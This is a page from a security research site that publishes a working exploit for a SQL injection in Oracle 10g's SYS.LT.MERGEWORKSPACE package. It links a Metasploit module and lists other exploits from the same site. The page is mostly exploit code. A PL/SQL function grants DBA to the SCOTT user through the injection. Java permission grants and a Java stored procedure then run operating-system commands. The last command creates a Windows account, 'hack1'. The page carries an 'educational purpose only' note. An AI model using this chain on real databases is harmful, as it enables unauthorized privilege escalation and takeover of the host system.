Services Vulnerabilities Exploits Publications News Blog About DSecRG


[10] Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit (Grant DBA+create OS user using java)

Metasploit module can be downloaded here:

http://www.dsecrg.com/files/exploits/lt_MERGEWORKSPACE.rb


/*********************************************************/
/*Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit**/
/****grant DBA and create new OS user (java)*************/
/*********************************************************/
/***********exploit grant DBA to scott********************/
/***********and execute OS command "net user"*************/
/***********using java procedures ************************/
/*********************************************************/
/***********tested on oracle 10.1.0.5.0*******************/
/*********************************************************/
/***********Note: for educational purpose only************/
/*********************************************************/
/* Date of Public EXPLOIT: January 6, 2009 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: Alexandr.Polyakov@dsec.ru */
/* site: http://www.dsec.ru */
/*********************************************************/
/*Original Advisory: */
/*Esteban Martinez Fayo [Team SHATTER ] */
/*Date of Public Advisory: November 11, 2008 */
/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/
/*********************************************************/

select * from user_role_privs;

CREATE OR REPLACE FUNCTION Y return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN 'Y';
END;
/

exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y');
exec SYS.LT.MERGEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y');



/* Creating simple java procedure that executes OS */

exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');

CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
import java.lang.*;
import java.io.*;
public class JAVACMD
{
public static void execCommand (String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
};
/

CREATE OR REPLACE PROCEDURE JAVAEXEC (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME 'JAVACMD.execCommand (java.lang.String)';
/

/* here we can paste any OS command for example create new user */

exec javaexec(‘net user hack1 12345 /add’);

select * from user_role_privs;

Exploits RSS RSS
03.05.2010
[17] ProSSHD v 1.2. Remote bind shell exploit (w/ASLR and DEP bypass using ROP)

05.03.2010
[16] SAP GUI 7.10 WebViewer3D ActiveX - JIT-Spray Exploit

05.03.2010
[15] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - JIT-Spray Exploit

15.02.2010
[14] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - hardware DEP bypass

15.02.2010
[13] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF

18.02.2009
[12] Oracle Database SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger (metasploit module)

Exploits list


© 2002—2014, ERPScan
For quoting or using materials from this site
link is obligatory

+44 (20) 81334493    e-mail: research@dsecrg.com
Rss: Vulnerabilities, Exploits, News, Publications, Summary
Search